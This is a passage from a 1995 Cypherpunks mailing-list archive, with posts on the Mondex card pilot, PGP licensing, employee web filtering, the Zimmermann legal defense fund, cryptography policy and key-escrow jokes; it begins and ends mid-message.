would have been totally stumped. It is a very elegant system.

Mondex, on the other hand, worried from the word go. It just didn't
seem to add up. Apart from everything else, why were they being so
damned secretive. I read and thought, and read and thought. Then it
finally dawned on me. Mondex just simply doesn't have the same
requirements list as ecash. I was prejudging the requirements from my
previous exposure to ecash.

Ask me to explain Mondex to you now ... what do you want to know :)

Andy M

     (this is my opinion of information gained outside of
       company time. It is not the opinion my employer.)


And :


On Jul 18, 12:29pm, Marcel van der Peijl wrote:
> Subject: Re: Mondex
> > I am participating in the Mondex pilot scheme in Swindon. It
> > took me a great deal of pushing to get _any_ details at all.
>
> Of course! Security through obscurity has always been a good way of
> protecting your systems... ;)

Absolutely. That's why VISA have lost so little money :)

> > 3 - Mondex is billed as "Electronic Cash", but you won't find the
> >     concept of anonymity in there anywhere. They talk about it,
> >     but I haven't seen them write it down explicitly.
>
> Hahahaha. Let me explain. You can buy the card anonymously. This
> gives anonimity....
> NOT!

Actually, you can't. You need to supply bank details in order to get
one. At least you do for the Swindon trial. The cards in use here are
in fact combined ATM and Stored Value ;) cards. They have all your
bank details in a mag. stripe on the back of the card. The current
batch of EPOS terminals don't use this stripe, but I wait with
interest.

> They are forgetting that tracebility plus one link of a person to
an
> 'anonymous' account is the same as identification.

Sainsbury's (et al) sussed that one a while back. Hence the
introduction of "Customer Loyalty Cards" (yuch!!). Thereby allowing
them to bind purchases/times/locations => Credit card numbers =>
Physical customer addresses & therefore demographic data. Only in
this situation for Credit card number read Mondex card ID.

> Do you realise any ATM, and a lot of stores, have security camera's
> embedded? No, they wouldn't use that to link a person to a card,
> would they? That would be unethical...

No need. They have not only formed the link, but they are getting you
to fill in the damned form :)

> > How about "Stored Value Card"
> For Mondex, perfect. What about FV? And NetChex?

Don't know about these ones.

> About your perception of ecash: I admit that the blurp on our
server
> does not fully cover the system in such a way it is easy to
remember
> and explain.

Not at all. If you had asked me to explain the system while it was
still fresh in my mind, I would have had no trouble. It is very neat
and logical, but it is also pretty intricate. Apart from anything
else, I didn't feel it was necessary to hold on to the mental model
of how it works. I liked it. However, Mondex ...

>-- End of excerpt from Marcel van der Peijl

Cheers

Andy M






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 18 Jul 95 15:56:54 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507182254.PAA06250@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:36 AM 7/18/95 EDT, Jim Grubs, W8GRT wrote:
>In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway.
That doesn't help anything - folks asked Bidzos about that one.
Of course, if your PGP version happens to output "2.7.1" as a version number,
it's not abusing any trademarks....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 18 Jul 95 15:56:49 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <199507182255.PAA06275@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM 7/17/95 -0700, Greg Broiles wrote:
>Consistent with the trend towards treating employees like children,

I'm not surprised someone sees a market for this.  I've worked at
a number of customer sites that block access to 900 numbers and
local pay-per-call numbers, which also blocks access to Time-of-day
and some vendors' customer-support numbers.

>Webster Network Strategies has announced (but apparently has not
>shipped) a product similar to SurfWatch but aimed at an employment
>environment. The product is called "WebTrack" and supposedly supports
>access lists of URLs, where access can be allowed to "all but these sites"
>or "only to these sites". The product also can be configured to log all 
>Web usage by users subjected to its reign of terror. :) WebTrack 
>is priced at $7,500 with an annual subscription to 

I assume for that price that it's a gateway product, rather than a site
license for a censored client (which would require sysadmins to go hunt
down everybody's copy of netscape...)  If so, I hope the system at least offers
caching (to save on outside bandwidth requirements and download time),
and has a fair amount of security so it doesn't become a hole in the firewall.

>its list of interesting (err, forbidden) sites priced at $1,500. 
Wow!  Folks have finally found a way to get paid for looking for porn on the
net! :-)
Surfwatch doesn't make it's censored list easily available (otherwise it'd
probably get pirated, or used as an "interesting sites" index...), but
apparently
it blocks access to things other than just pornography - does Webster
indicate what categories of stuff they're blocking?

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Tue, 18 Jul 95 16:01:37 PDT
To: cypherpunks@toad.com
Subject: [shofar@Rt66.com: LEGISLATIVE WATCH AD]
Message-ID: <9507182303.AA11619@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



fyi...

Date: Tue, 18 Jul 1995 08:35:45 -0600 (MDT)
From: DJABS <shofar@Rt66.com>
To: apologia-l@netcom.com
Subject: LEGISLATIVE WATCH AD 

   _/    _/       _/
  _/      _/  _/ _/
 _/        _/_/ _/
_/_/_/_/    _/ _/   LEGISLATIVE WATCH
___________________________________________________________
Subscribe Direct >>>>>>>>>>>>>>>>>>>>>>>>  shofar@RT66.com


Interested in catching the political wave?  "Legislative Watch" 
is an electronic newsletter with a focus on First Amendment 
concerns, religious liberty and other Constitutional issues. 
Subscribe direct at: shofar@RT66.com

    subject line:  <subscribe LW>
    message line:  <email address> <name>

____________________________________________________________________


-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Tue, 18 Jul 95 13:44:22 PDT
To: liberty@gate.net
Subject: Re: Re: Root Causes Roots
Message-ID: <2515@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The ported URL of my clipper piece seems to have gone spare.  He's another try:

www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 18 Jul 95 08:46:38 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: Zimmerman legal fund
Message-ID: <23424.9507181545@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anon writes:
> Could someone in the know talk about the relationship between FV and
> the ZLDF? I don't like to spread misinformation, so I won't answer
> based on conjectures.

I'd be interested to hear this too, but what I am concerned about is
that the whole thing is too strongly tied to first virtual.

I mean there was the Yellow Ribbon Campaign but all URLs out of that
page point to FV, no mention of the at least two other (more
convenient for most people, and hence in Phil Zs interests) methods:

a) PGPed email CC no. to Phil Dubois (Phil Zs chief legal counsel)

b) similar PGPed email CC no. to some guy in Europe who was offering
to collect up all of the European donations, and send them to Dubois
in lump sums to save on currency exchange costs.

Both of these I believe have been signed by people who directly have
their keys signed by Phil Z himself, I have a copy of PGP signed a)
saved from the original post made by Hugh Miller
<hmiller@orion.it.luc.edu> and this is what I show to people who ask.

(copy of the bank details from Hugh's post pasted below as [1]
original PGP signed post by Hugh by email).

Geoffrey Kidd <kalothi1@violet.berkeley.edu> has the details from
Hugh's post in his Phil Z Blood Bank which he posts to
alt.security.pgp periodically, the idea being that enough folks give
money to the Phil Z legal defense fund on a regular small donation
basis, if enough people did this he could be supported indefinately.

What I would like to know is why neither of these [a) or b)], and
especially why a) has not been mentioned on any of the widely
advertised yellow ribbon campaign pages... is it for Phil Z ... or is
it for Phil Z with the provision that you start a FV account something
which not everyone who wants to contribute to Phil Z is likely to want
to be bothered doing.

No slur on FV, just it adds unnecesary complications to donations,
through what now must be _the_ most widely publisized USENET based
effort to raise funds for Phil.

Adam

[1]
======================================================================
[...]
    To send a check or money order by mail, make it payable, NOT to Phil
Zimmermann, but to "Philip L. Dubois, Attorney Trust Account."  Mail the
check or money order to the following address:

    Philip Dubois
    2305 Broadway
    Boulder, CO USA 80304
    (Phone #: 303-444-3885)

    To send a wire transfer, your bank will need the following
information:

    Bank: VectraBank
    Routing #: 107004365
    Account #: 0113830
    Account Name: "Philip L. Dubois, Attorney Trust Account"

    Now here's the neat bit.  You can make a donation to the PZDF by
Internet mail on your VISA or MasterCard.  Worried about snoopers
intercepting your e-mail?  Don't worry -- use PGP.

    Simply compose a message in plain ASCII text giving the following:
the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank
name of your VISA or MasterCard; the name which appears on it (yours,
hopefully :-)); a telephone number at which you can be reached in case
of problems; the card number; date of expiry; and, most important, the
amount you wish to donate.  (Make this last item as large as possible.)
Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's
public key, enclosed below.  (You can also sign the message if you
like.)i  E-mail the output file to Phil Dubois (dubois@csm.org).
						^^^^^^^^^^^^^^

[this is a mistake Hugh made Dubois' address is dubois@csn.org as can
be easily verified from his PGP key, which is signed by Phil Z also]

Please be sure to use a "Subject:" line reading something like "Phil
Zimmermann Defense Fund" so he'll know to decrypt it right away.

    Here is Phil Dubois's public key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7

mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8
5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR
rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR
tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE
uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF
i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN
dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw==
=5uit
- -----END PGP PUBLIC KEY BLOCK-----

                           *    *    *

    This campaign letter will be posted in a number of Usenet groups.
I will also be turning it into a FAQ-formatted document, which will be
posted monthly in the relevant groups and which will be available by
anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ.  If
you come upon, or up with, any other ways in which we can help raise funds
for Phil, drop me a line at hmiller@luc.edu and let me know, so that I
can put it in the FAQ.

[...]
======================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMAvXCSnIuJ1VakpnAQEicgP7Bn6ryN540LbdneN4PXyrODCzjy4fgW9b
XP5PG8ledoro374I/ZuOJvL8HLcSNBRRrJE1MpIRykEHi8cXlpINLdsxqVlat+OI
TxsEPntsH5WJJsaFb+xFdcAj681IEGFLJWdfx44SlH0eHVcsmQLmj5P3e/XUeIYr
1W3pyym0a0E=
=bzs2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 18 Jul 95 13:49:15 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
Message-ID: <199507182047.QAA03926@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <21076.9507180656@exe.dcs.exeter.ac.uk>, aba@atlas.ex.ac.uk wrote:

>> Is there an easy way to integrate machines who are not on-net 24-7
>> into this protocol?  Not all of us have dedicated lines.:)
>
>Well you could run a local master, ... or as you are using NT right?
>you could use Andy's code when he adds socket support to interface to
>masters.
>
>As to the problem of not having 24-7 connectivity, you could either
>use the WWW page, or the server (it will do this anyway) will keep
>re-trying to get a socket connect to the master until it suceeds, so
>when you next go on-line ...  wham it gets through again as
>connectivity is resumed and says whatever it has been trying to say.
>We need it to retry in case of network out (or horror) big master
>falling over, until it gets resumed.

On many machines that will mean that it will try to initiate a connection
to the host. Please allow for a manual connect option.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAwdryoZzwIn1bdtAQHrDwGArifMl83/simhOGutmo8FhYgtCMZ+9g5E
stSoeOysXuLCvv3EK3PTTUO4LdtPbhnn
=rq/L
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Tue, 18 Jul 95 16:53:03 PDT
To: stewarts@ix.netcom.com
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com>
Message-ID: <9507182352.AA11660@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



   Date: Tue, 18 Jul 1995 15:57:54 -0700
   From: stewarts@ix.netcom.com (Bill Stewart)
   Cc: info@webster.com
   Sender: owner-cypherpunks@toad.com

   At 11:36 PM 7/17/95 -0700, Greg Broiles wrote:
   >Consistent with the trend towards treating employees like children,

   I'm not surprised someone sees a market for this.  I've worked at
   a number of customer sites that block access to 900 numbers and
   local pay-per-call numbers, which also blocks access to Time-of-day
   and some vendors' customer-support numbers.

Also 911 apparently, I've heard...

-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 18 Jul 95 16:58:49 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <9507182330.AA23645@cfdevx1.lehman.com>
Message-ID: <199507182358.QAA10553@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Rick Busdiecker <rfb@lehman.com> writes:
>   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>

>   In practice, I'd probably buy Viacrypt for legal reasons but use
>   PGP anyway.

>I'd be interesting in hearing some of the lawyers out there comment on
>this.

Does RSADSI count as having lawyers?  So far as I know they have not
commented in public about whether the ViaCrypt license is valid, but
they have also not (to my knowledge) contested it.  However, Jim Bidzos
has explicitly said that it is not acceptable to buy a ViaCrypt license
to cover your use of non-ViaCrypt PGP.

	Jim Gillogly
	Hevensday, 25 Afterlithe S.R. 1995, 23:53




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 18 Jul 95 08:37:07 PDT
To: Andrew.Spring@ping.be
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507181535.AA21841@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> >1. If the bill becomes law, how can someone who violates it be
> >punished?
> >
> 
> - From the top of my head:
> Subpoena your service provider's computer records. 


That's not a problem. He will find a lot of encrypted
messages and images of nude girls. Both is not illegal. :-)


> Intimidate your roommate
> into testifying against you.  

I don't have a roommate.


> Tapping your phone. 


I use encrypted modem connections and Nautilus.



> Feds are in the business of putting people behind bars.  They are _very_ good
> at it.

That's the question. How long can they put me behind bars?




> I'm betting that the Feds will adopt as a working definition anything that
> requires a key to decrypt the communications.  That means compression
> software, rot13, and most hash functions are ok.

rot13 is not ok, 13 is the key. Someone should register at the department. :-)



> Expert Testimony:  "We experimented with 113,296 keys chosen at random and
> the defendants algorithm took an average of 29,000 years to find each one.
> It is our professional opinion, therefore, that the defendant is jacking us
> around and ought to be keelhauled".

Oh boy, wonderful experts....



Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 18 Jul 95 17:27:21 PDT
To: perry@imsi.com (Perry E. Metzger)
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <hyEDwkkAsCDI084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 95, perry@imsi.com (Perry E. Metzger) wrote:
> We appear to have an nntp/mail loop in progress. I believe the problem
> is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the
> mailing list (ugh!).

Yes, and I suppose everyone got the message I stupidly sent to the
list rather than to majordomo trying to figure this out...sorry.

This list is supposed to be gated to a Nyx newsgroup via
cypherpunks@cs.du.edu, as I recall, but is also being sent to
cypherpunks@nyx.cs.du.edu, and to a couple of individual users:

apoulter@nyx.cs.du.edu (Alan  Poulter)
cypherpunks@nyx.cs.du.edu
jannis@nyx10.cs.du.edu
cypherpunks@cs.du.edu

I'm not sure if this is related to the crash; I was getting a few
double postings from mnemosyne before the crash, but they seem to
have increased.  I've Cc:'d the sysadmin at DU, but removing the
cypherpunks@nyx.cs.du.edu subscription might be in order.  BTW,
mnemosyne is the news server at DU...

If it keeps up, I have no doubt someone will forge an unsubscribe
request...:-)  Anyway, maybe Hugh and/or Andrew can solve this in
a less hackish manner...


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 18 Jul 95 17:29:33 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: We appear...
In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu>
Message-ID: <Pine.LNX.3.91.950718182747.580H-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 1995, L. McCarthy wrote:

> Date: Tue, 18 Jul 1995 20:06:40 -0400 (EDT)
> From: L. McCarthy <lmccarth@thor.cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Cc: cypherpunks-owner@toad.com
> Subject: Re: We appear...
> 
> .pm writes:
> > We appear to have an nntp/mail loop in progress. I believe the problem
> > is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the
> > mailing list (ugh!).
> 
> Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for
> a week or more. I wrote to postmaster@cs.du.edu and it bounced from someone's
> personal mailbox (!)

folks,  the problem is this:  the cypherpunks mailing list is read as a 
newsgroup on nyx.cs.du.edu.  it seems they must have messed up their 
config recently otherwise we would have been seeing this for more than a 
year.  anyway, i wrote the sysadmin at nyx.cs.du.edu (aburt@nyx...) so 
hopefully this will be taken care of soon.

-pat


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 18 Jul 95 17:40:51 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: cfs for linux
Message-ID: <Pine.LNX.3.91.950718183640.580I-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

some time ago i inquired about an encryption program for linux.  i 
eventually obtained cfs from Matt Blaze (thanks...).  i haven't dealt 
with this for some time but i have been unable to compile it.  

if anyone running linux has it working i'd appreciate hearing from you. 

here are the errors i get if anyone is interested...

       zifi:~/projects/cfs> make
       cc -O   -c cfs_adm.c -o cfs_adm.o
       cfs_adm.c: In function `admproc_null_2':
       cfs_adm.c:47: number of arguments doesn't match prototype
       admproto.h:183: prototype declaration
       cfs_adm.c: In function `admproc_attach_2':
       cfs_adm.c:54: argument `rp' doesn't match prototype
       admproto.h:186: prototype declaration
       cfs_adm.c: In function `admproc_detach_2':
       cfs_adm.c:155: argument `rp' doesn't match prototype
       admproto.h:189: prototype declaration
       make: *** [cfs_adm.o] Error 1


thanks,

- -pat

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAxUm03Qo/lG0AH5AQE4DAQAoxA44ESm/7xQ1ke+8yo2VqCemmlrKJkh
2vuJnC4lhayAWEHzKuiqf3G3AAPHHqQdX8JBGNZWt0TAuyoGMWTRI2/U0jTe82AC
ew4Y6WzZTEvmdxHaxTFU9R2q6MUOGe4U6Bmdt8tMeU2hy5jDvoijgdiSfBJrU9eS
p2Cd2eigAFs=
=cQCG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Tue, 18 Jul 95 11:52:22 PDT
To: gnu@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <9504192139.AA00379@toad.com>
Message-ID: <m0sYLQw-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In April, gnu asked:
> Herb Lin called today to ask if the Cypherpunks could come up with a
> list of questions for their panel to ask the law enforcement community
> about crypto policy.  They will be meeting with senior law enforcement
> officials like FBI Director Freeh a week or so from now.

Did we ever get any feedback on this?

- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMAw6JRqU5+N/mI7JAQEWQQP/UCKWs1m8cMbbG7pAk7CKPjKSAP9yJLvw
m+vBFcC+TuFPrQSEjhK7s4qJnck3IzIXl7AmV70NFkr9Dc1Wni7YHkrfhx0nnRRe
7F131pKMNlgypyX/u3FaEHXtCxQV9R5IpYzBAGpvQ++3dzR7LdXcvS2I7kvcWf2G
6knV4KwHvp4=
=9+ER
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 18:56:48 PDT
To: cypherpunks@toad.com
Subject: Mandatory key registration
Message-ID: <9507190156.AA00268@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In the event of legally required key registration,
I would like to continue to use PGP.  My private RSA 
key is my own business, so I would like to comply 
with the requirements by registering my IDEA keys 
instead.  There are approximately 2**128 of them, and
I'm not quite sure which one will be used next, so 
can I just register ALL of them?  Can I do this on-line?
If all the cypherpunks use the same key set, must we each 
register all of them, or will a single list do?
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 18 Jul 95 16:04:57 PDT
To: cypherpunks@toad.com
Subject: Commercenet document on cryptography
Message-ID: <v01520d02ac320a1e64c0@[192.107.41.251]>
MIME-Version: 1.0
Content-Type: text/plain


I found the following on CommerceNet:

  http://www.commerce.net/information/position/position.062695.html

  Toward Enabling Secure Electronic Commerce:
  The Need for a Revised U.S. Cryptographic
  Policy

  by CommerceNet Network Services Working Group

It seems to address all the issues.


--
Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 18 Jul 95 17:34:26 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD6103.0003000176.uuout@famend.com>
Message-ID: <8AD747E.00030001AC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> Rather than spend five minutes writing something on your own you'd end
PE> up something that looks totally fake.  I believe that what is going on

  No, that's "rather than not writing anything at all". I know how to
call and write to my congresscritters. The idea of the WWW page is for
those who wouldn't take the initiative to do it in the first place.

PE> would be discerned by a staffer in moments. Crap like this is called

  They should know, because they send form letters to constituents all
the time, only they don't bother to vary it a bit.

PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.

  Meanwhile, back at the ranch... If one of our DC members can set up an
Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
send things in their own words, if possible, and if they don't have any
words of their own, they can borrow some. Boilerplate has to be better
than nothing.



 * Is there such a thing as a "gruntled" Postal employee?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 18 Jul 95 17:34:21 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Root Causes
In-Reply-To: <8AD533C.000300016D.uuout@famend.com>
Message-ID: <8AD747E.00030001AB.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


[Disclaimer: IASNAL, but I am the host of the Bill of Rights Conference
on the U'NI echonet, where these issues are discussed from time to time.]

JR> >violation of the right to privacy?
JR>
JR> Good idea, but I have an idea to upset even *more* people.

                    [9th and 10th Amendment stuff]

  Them, too.

JR> Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary

  The reason there was no BOR in the original Constitution was precisely
that some folks were afraid that the enumeration of some rights would
imply that there are none other. The DOI and other writings of the FFs
clearly show that rights are naturally inherent in individual human
beans, and that the power of government comes from us, not the other way
around. But the FFs also knew that the prevailing view was that rights
are what is left over after the government is done flexing its muscles.

  Bottom line: The Bill of Rights was passed in the Congress as a
12-article gang-bang amendment, and the 10 of them that became the BOR
were passed as an organic whole by the several states. [And, of the
other two articles, which clearly didn't belong in a BOR, one of them
was ratified a few years ago even.] This means that without =any= of the
10 amendments, there would be =no= BOR.


JR> slow erosion of freedom in this country. My rejoinder is "OK, if we're
JR> supposed to ignore it, why not just REPEAL it, after all, it's just sitting
JR> there doing nothing, cluttering up the rest of the Bill of Rights." Usually,

  Don't give them any ideas! The 2nd is already on that list, and part
of the 1st (that refers to "flag desecration", which apparently is more
serious than =Constitution= desecration)... don't get me started, I'm
way off crypto already.

JR> talking about Constitutional issues on encryption rights, if for no other
JR> reason than to educate the public. In court, of course, I would concentrate
JR> on the 1st. Apologies to the various lurking law professors on the list, I

  Actually, I would kick in 2 and 4. The government has called crypto a
munition, and it =is= a valuable tool for the unorganized militia to
fight a guerilla war against an occupation force. The 4th amendment
protections against search and seizure are the moon which creates the
penumbra of Roe v. Wade.> U'NInet Bill of Rights Conference Host

 * Physician, heal thyself!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sat, 19 Aug 95 18:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
In-Reply-To: <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>
Message-ID: <jDEDw4NQnUXH084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>,
David Neal <dneal@usis.com> wrote:
-=}On Fri, 18 Aug 1995, David K. Merriman wrote:

-=}> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
-=}> that key storage will be on an old 40M RLL drive on an 8088 machine, so
-=}> retrieval may be a bit slow and unreliable.......

-=}Same here -- I have an original Compaq "Sewing Machine" Portable with
-=}a 40MB hard card.  Of course the HD sticks and needs a good whacking
-=}sometimes, and the last floppy came out of the drive smoking and
-=}covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)
-=}
-=}My service, however is $2.  That's because all keys are encrypted against
-=}my key, which is unfortunately escrowed with the fellow listed above.
-=}
-=}Sorry about having to pass along the extra costs. :-)

I'll escrow my key with David, encrypt yours with it then
print it out and store it in a secure filing cabinet in the
salt mines near detroit.

I'll need to charge $3.00 per key, overhead you know.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Tue, 18 Jul 95 16:18:30 PDT
To: cypherpunks@toad.com
Subject: We appear...
Message-ID: <9507182318.AA08206@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


We appear to have an nntp/mail loop in progress. I believe the problem
is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the
mailing list (ugh!).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 18 Jul 95 19:21:18 PDT
To: cypherpunks@toad.com
Subject: Re: Mandatory key registration
Message-ID: <ac31ba320a0210047bdd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:56 AM 7/19/95, rick hoselton wrote:
>In the event of legally required key registration,
>I would like to continue to use PGP.  My private RSA
>key is my own business, so I would like to comply
>with the requirements by registering my IDEA keys
>instead.  There are approximately 2**128 of them, and
>I'm not quite sure which one will be used next, so
>can I just register ALL of them?  Can I do this on-line?
>If all the cypherpunks use the same key set, must we each
>register all of them, or will a single list do?

It seems likely to me that an actual GAK system will require some fee per key.

For example, one might have to send in a form, maybe a diskette, and a $25
per key fee for "handling costs."

This is the way automobile registrations are handled (and they have become
